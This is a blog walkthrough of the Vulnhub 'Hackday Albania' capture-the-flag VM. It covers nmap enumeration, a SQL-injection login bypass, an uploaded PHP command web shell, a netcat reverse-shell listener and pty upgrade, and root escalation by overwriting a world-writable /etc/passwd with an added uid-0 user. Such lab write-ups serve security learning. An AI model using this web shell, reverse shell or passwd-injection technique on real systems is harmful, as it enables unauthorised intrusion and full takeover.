Vulnhub: Hackday Albania

Author: Tanoy Bose
2016-11-24 Comments

A new night, and a new virtual image to break. Hah! Sound fun.

We begin Hackday Albania, the usual way, by setting up Virtual box, on host-only mode.

Enumeration

We launch our nmap with the following command

1
n0tty@c0ffee$ nmap -A 192.168.56.101

Ofcourse, we now get the open ports available here.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
Nmap scan report for 192.168.56.101
Host is up, received arp-response (0.00032s latency).
Scanned at 2016-11-20 00:19:00 EST for 8s
Not shown: 998 closed ports
Reason: 998 resets
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 39:76:a2:f0:82:5f:1f:75:0d:e4:c4:c5:a7:48:b1:58 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCYm2x67Jj76wxF+iPVxNiOHoPWukWz7tqhCrzIjI/NPRSOAaBQAv8eNaWt3d5sWHwH0Gaec2rmxAPq60oqpfjXtRrIVixtA6T8kAXd6iuVyzJvXQ9Fat0vcG8elVU54s/eAnA3il7oYj5AC+is1+dyVfol2BE9bpE1k4W6LS1UGTBzgyed/jQunvUtO0SLdwUqBA8uFE7cYqD1hca6GX1nUBT5KkA1IlLygvdpBKOsP++0cH57/4jBT6NSoWt5HHgEzkvfiKNQqXHxhlYeneNxOn6kIYGbZS0LVEJYa0dFSYvjA/gKwaWlBRxjAwG7+L9qKiMIxUjseZ84XGcdMLVR
|   256 21:fe:63:45:2c:cb:a1:f1:b6:ba:36:dd:ed:d3:d9:48 (ECDSA)
|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLS9vX2eL3WWhdkq642JEUKJ0YUhl7j8TfZDrcNblmHMfAOdlilyCam4ZvH+xdACaCK0rpkBabayCC/MEDbscNI=
8008/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 26 disallowed entries 
| /rkfpuzrahngvat/ /slgqvasbiohwbu/ /tmhrwbtcjpixcv/ 
| /vojtydvelrkzex/ /wpkuzewfmslafy/ /xqlvafxgntmbgz/ /yrmwbgyhouncha/ 
| /zsnxchzipvodib/ /atoydiajqwpejc/ /bupzejbkrxqfkd/ /cvqafkclsyrgle/ 
| /unisxcudkqjydw/ /dwrbgldmtzshmf/ /exschmenuating/ /fytdinfovbujoh/ 
| /gzuejogpwcvkpi/ /havfkphqxdwlqj/ /ibwglqiryexmrk/ /jcxhmrjszfynsl/ 
| /kdyinsktagzotm/ /lezjotlubhapun/ /mfakpumvcibqvo/ /ngblqvnwdjcrwp/ 
|_/ohcmrwoxekdsxq/ /pidnsxpyfletyr/ /qjeotyqzgmfuzs/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HackDay Albania 2016

Dang! So we gotta pwn all these paths? Ok, so let us start the pwnage.

1
2
3
4
5
6
n0tty@c0ffee$ curl 192.168.56.101:8008/robots.txt | cut -d "/" -f2 > paths_available
n0tty@c0ffee$ echo "">out_file
n0tty@c0ffee$ while read line; do wget 192.168.56.101:8008/$line; done < paths_available
n0tty@c0ffee$ while read line; do echo $line; cat $line; echo "--------------------------------------------------"; done < paths_available >> out_file
n0tty@c0ffee$ while read line; do rm $line; done < paths_available
n0tty@c0ffee$ rm paths_available

Now just checking the out_file, we can see

1
2
3
4
</html>--------------------------------------------------
unisxcudkqjydw
IS there any /vulnbank/ in there ???
--------------------------------------------------

Vulnerable Bank

And hence we traverse to the link (just follow the directories) - http://192.168.56.101:8008/unisxcudkqjydw/vulnbank/client
Vulnerable Bank

Exploitation Stage 1 - Access Compromise

Good god, a Login page? Looking around, and not trying to brutefore, we realize it would be SQL injection vulnerable.
SQL Error occurs

On investigating further and thanks to the article on exploit db on False SQL injection that I had read a couple of years earlier, I was able to bypass the authentication.
False Injection

Pwned!

Successful Login

Exploitation Stage 2 - Uploading a reverse shell

Here ofcourse, we see contact support field with file upload option available. We immidiately attempt to upload a shell.

Here, we 1st go for a small shell of ours

1
2
3
4
5
6
7
<?php  
if(isset($_REQUEST['cmd'])){  
  $cmd = ($_REQUEST["cmd"]);  
  system($cmd);  
  echo "</pre>$cmd<pre>";  
  die;}  
?>

Basic PHP shell

This obviously gives us a non-interactive and a pain in the ass command shell. Hence we quickly switch to Pentest Monkey’s php-reverse-shell.
Executing this shell, we get a non-interactive sh prompt.

1
2
3
4
5
6
7
8
9
10
n0tty@c0ffee$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.101] 51250
Linux hackday 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 07:29:34 up 41 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

To convert this shell to an interactive one, I generally use a python one-liner, but unfortunately it didn’t run at the 1st go. Hence we enumerate and realise that this machine has python3 instead of python.

1
$ python3 -c 'import pty; pty.spawn("/bin/sh")'

Post exploitation was a little time consuming though. I attempted Dirty COW exploit and failed. I tried to exploit the mysql service (whose password we can get from config.php in the /var/www/html/unisxcudkqjydw/vulnbank/client/ folder) and failed again.
Now whatever was left to do was g0tm1lk’s Basic Linux Priviledge Escalation

1
$ find / -type f -perm -o=w 2>/dev/null

Fun, fun, fun. A writeable /etc/passwd.

1
$ cat /etc/passwd

I added a new user on my own system and set a password for the system. (ThisIsSimplePassword@1234)

1
test:$6$.LkwCuzM$RGGbHv6CU61Yzk9baltbcgiA08I60BNEvIk2i0Q744alWYj0lFN5AKGll45CwmoRsxPYsjCmNRv3s1ajsjo8Q/:17127:0:99999:7:::

I downloaded the /etc/passwd file from the server and added the same line above with a little modification at the end.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:$6$.LkwCuzM$RGGbHv6CU61Yzk9baltbcgiA08I60BNEvIk2i0Q744alWYj0lFN5AKGll45CwmoRsxPYsjCmNRv3s1ajsjo8Q/:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false lxd:x:106:65534::/var/lib/lxd/:/bin/false mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash
test:$6$.LkwCuzM$RGGbHv6CU61Yzk9baltbcgiA08I60BNEvIk2i0Q744alWYj0lFN5AKGll45CwmoRsxPYsjCmNRv3s1ajsjo8Q/:0:0:tester:/root:/bin/bash

I edited the /etc/passwd file on my system, re-uploaded on the server and replaced the origical /etc/passwd file. I used this method because I was having a lot of trouble editing the original /etc/passwd file using any editor.
Now we pwn the flag

1
2
3
4
$ su test
Password: ThisIsSimplePassword@1234
root@hackday:/home# cd /root/
root@hackday:~# cat flag.txt

Urime,
Tani nis raportin!

d5ed38fdbf28bc4e58be142cf5a17cf5

#Vulnhub #Hackday #Albania